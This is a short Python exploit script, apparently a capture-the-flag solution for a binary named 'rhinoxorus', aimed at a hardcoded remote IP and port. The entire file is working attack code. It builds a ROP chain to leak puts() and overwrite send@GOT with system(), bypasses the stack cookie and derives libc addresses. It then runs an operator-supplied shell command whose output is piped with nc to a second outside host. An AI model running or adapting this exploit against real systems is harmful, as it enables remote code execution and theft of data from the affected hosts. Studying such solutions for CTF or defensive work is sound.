rhinoxorus.py

#!/usr/bin/python

from Pwn import *

p = Pwn(host='54.152.37.20',port=24242)
# p = Pwn(port=24242)

def exploit():
	shell = raw_input('> ')
	back_connect = shell + ' | nc 128.199.171.28 8001'

	rop = [
		0x8048740, # send
		0x080578f8, # pop 4 ; ret
		0x4, # fd
		0x0805f02c, # puts
		8, # size
		0x0, # flag
		0x8048720, # recv
		0x080578f8, # pop 4 ; ret
		0x4, # fd
		0x0805f068, # overwrite send@got with system
		4 + len(back_connect) + 1, # size
		0x6, # flag
		0x08048878, # system
		0x0805f068 + 4
	]

	payload = 'AAAAAAA' + p.pA(rop)
	payload+= 'A'*(127 - len(payload))
	payload+= '\x00'*4 # cookie ^ zero = cookie
	payload+= '\x00'*4
	payload+= '\x00'*4 # use the same ebp
	payload+= p.pack(0x8e0 ^ 0x9e8) # point save ebp to own buffer :D
	payload+= p.pack(0x08056b39 ^ 0x08056AFA) # own ret address : nop; leave ; ret
	payload+= '\x00'*4 # use same args
	payload+= p.pack(0x9e) # break the loop
	payload+= 'A'*4

	p.connect()

	p.send('\xff' + payload)
	leak = p.recv(8)

	puts_addr = p.unpack(leak[:4])
	system_addr = puts_addr - p.get_libc_offset(puts_addr,'puts')

	print '[+] puts():',hex(puts_addr)
	print '[+] system():',hex(system_addr)

	p.send(p.pack(system_addr) + back_connect)

	# p.io()

exploit()